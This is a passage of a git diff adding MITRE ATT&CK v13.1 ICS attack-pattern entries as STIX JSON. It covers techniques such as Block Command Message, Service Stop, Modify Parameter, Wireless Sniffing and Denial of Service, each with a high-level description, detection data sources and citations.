"1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "initial-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61.json new file mode 100644 index 0000000000000000000000000000000000000000..70ea1cd745cb8a63df01ed87c054ae5d697d83c0 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--24c2c656-e8bf-4ca2-a206-e69f101e3ef3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Block Command Message", + "description": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Device Configuration/Parameters" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Application Log: Application Log Content", + "Operational Databases: Process/Event Alarm", + "Process: Process Termination" + ], + "type": "attack-pattern", + "id": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0803", + "external_id": "T0803" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 
2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8.json new file mode 100644 index 0000000000000000000000000000000000000000..91314e6512e0b8fa48557e46e589ecc9c1c8f5a4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--c8289b0b-14f7-4150-b403-d0d853797508", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Service Stop", + "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Engineering Workstation" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + "Process: Process Termination", + "File: File Modification", + "Process: OS API Execution", + "Process: Process Creation", + "Command: Command Execution", + "Service: Service Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0881", + "external_id": "T0881" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Service Stop Retrieved. 
2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + }, + { + "source_name": "Enterprise ATT&CK", + "description": "Enterprise ATT&CK Enterprise ATT&CK Service Stop Retrieved. 2019/10/29 Service Stop Retrieved. 2019/10/29 ", + "url": "https://attack.mitre.org/techniques/T1489/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722.json new file mode 100644 index 0000000000000000000000000000000000000000..4c73578dd8d152be31b39e0ca113901df97c5e95 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--575cf97f-064b-4d37-a97a-16a08adeaec8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T14:15:29.756Z", + "name": "Modify Parameter", + "description": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor. \n\nAn adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. 
For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Human-Machine Interface" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Asset: Asset Inventory", + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0836", + "external_id": "T0836" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243.json new file mode 100644 index 0000000000000000000000000000000000000000..f0edb10010a686419fbabbc504ad78d7e72a7b6b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--0e6b28a8-6cb3-4ca7-b7f5-e8f48370d7d9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Modify Controller Tasking", + "description": "Adversaries may modify the tasking of a controller to allow for the execution of their own programs. This can allow an adversary to manipulate the execution flow and behavior of a controller. \n\nAccording to 61131-3, the association of a Task with a Program Organization Unit (POU) defines a task association. (Citation: IEC February 2013) An adversary may modify these associations or create new ones to manipulate the execution flow of a controller. Modification of controller tasking can be accomplished using a Program Download in addition to other types of program modification such as online edit and program append.\n\nTasks have properties, such as interval, frequency and priority to meet the requirements of program execution. Some controller vendors implement tasks with implicit, pre-defined properties whereas others allow for these properties to be formulated explicitly. An adversary may associate their program with tasks that have a higher priority or execute associated programs more frequently. 
For instance, to ensure cyclic execution of their program on a Siemens controller, an adversary may add their program to the task, Organization Block 1 (OB1).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Application Log: Application Log Content", + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0821", + "external_id": "T0821" + }, + { + "source_name": "IEC February 2013", + "description": "IEC 2013, February 20 IEC 61131-3:2013 Programmable controllers - Part 3: Programming languages Retrieved. 2019/10/22 ", + "url": "https://webstore.iec.ch/publication/4552" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72.json new file mode 100644 index 0000000000000000000000000000000000000000..5f8ba3294d66c45bd030237e3fcceb00c2859904 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72.json 
@@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--d80c9623-be6d-4f18-8399-27168ac87c6c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Wireless Sniffing", + "description": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018) The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum. \n\nAdversaries may capture RF communications by using specialized hardware, such as software defined radio (SDR), handheld radio, or a computer with radio demodulator tuned to the communication frequency. (Citation: Bastille April 2017) Information transmitted over a wireless medium may be captured in-transit whether the sniffing device is the intended destination or not. This technique may be particularly useful to an adversary when the communications are not encrypted. (Citation: Gallagher, S. April 2017) \n\nIn the 2017 Dallas Siren incident, it is suspected that adversaries likely captured wireless command message broadcasts on a 700 MHz frequency during a regular test of the system. These messages were later replayed to trigger the alarm systems. (Citation: Gallagher, S. 
April 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "ICSCoE Japan" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0887", + "external_id": "T0887" + }, + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + }, + { + "source_name": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018", + "description": "Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. 2018, April Guide to Industrial Wireless Systems Deployments Retrieved. 2020/12/01 ", + "url": "https://nvlpubs.nist.gov/nistpubs/ams/NIST.AMS.300-4.pdf" + }, + { + "source_name": "Gallagher, S. April 2017", + "description": "Gallagher, S. 2017, April 12 Pirate radio: Signal spoof set off Dallas emergency sirens, not network hack Retrieved. 
2020/12/01 ", + "url": "https://arstechnica.com/information-technology/2017/04/dallas-siren-hack-used-radio-signals-to-spoof-alarm-says-city-manager/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36.json new file mode 100644 index 0000000000000000000000000000000000000000..386784c4e25d54d582bbac6edfea677673a25ca4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--cd36473f-7242-4c74-b703-3fb353ddab2b", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of View", + "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Engineering Workstation" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0829", + "external_id": "T0829" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 
2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--19a71d1e-6334-4233-8260-b749cae37953.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--19a71d1e-6334-4233-8260-b749cae37953.json new file mode 100644 index 0000000000000000000000000000000000000000..d93a2acf2543487728f49430a33e590649dc5343 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--19a71d1e-6334-4233-8260-b749cae37953.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--e2e8cb6c-3007-4282-91c2-120c590e5f67", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Activate Firmware Update Mode", + "description": "Adversaries may activate firmware update mode on devices to prevent expected response functions from engaging in reaction to an emergency or process malfunction. For example, devices such as protection relays may have an operation mode designed for firmware installation. This mode may halt process monitoring and related functions to allow new firmware to be loaded. A device left in update mode may be placed in an inactive holding state if no firmware is provided to it. By entering and leaving a device in this mode, the adversary may deny its usual functionalities.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0800", + "external_id": "T0800" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1.json new file mode 100644 index 0000000000000000000000000000000000000000..a62fc583fdecece2cc6da986efb389b70e1ba953 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1.json 
@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--3d498eba-2090-415d-8881-5bc8e1291d23", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Manipulation of Control", + "description": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. \n\nMethods of Manipulation of Control include: \n\n* Man-in-the-middle \n* Spoof command message \n* Changing setpoints \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. 
(Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0831", + "external_id": "T0831" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b.json new file mode 100644 index 0000000000000000000000000000000000000000..e5ec4f631c107a47b75372da971c14a01976d5f2 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--0f449267-8ddf-4d23-b45f-46ea033e1e4c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:16:01.922Z", + "name": "Denial of Service", + "description": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. \n\nSome ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) \n\nAdversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. \n\nAdversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. 
(Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0814", + "external_id": "T0814" + }, + { + "source_name": "Common Weakness Enumeration January 2019", + "description": "Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource Consumption Retrieved. 2019/03/14 ", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "source_name": "ICS-CERT April 2017", + "description": "ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01" + }, + { + "source_name": "MITRE March 2018", + "description": "MITRE 2018, March 22 CVE-2015-5374 Retrieved. 
2019/03/14 ", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5374" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60.json b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60.json new file mode 100644 index 0000000000000000000000000000000000000000..8c82a82f6f61e7c1c298b199d98c051cf9edc96c --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/attack-pattern/attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--171b7d8c-480a-4d85-8ae1-5f1a0a9bc9ae", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T21:02:54.674Z", + "name": "Block Serial COM", + "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. 
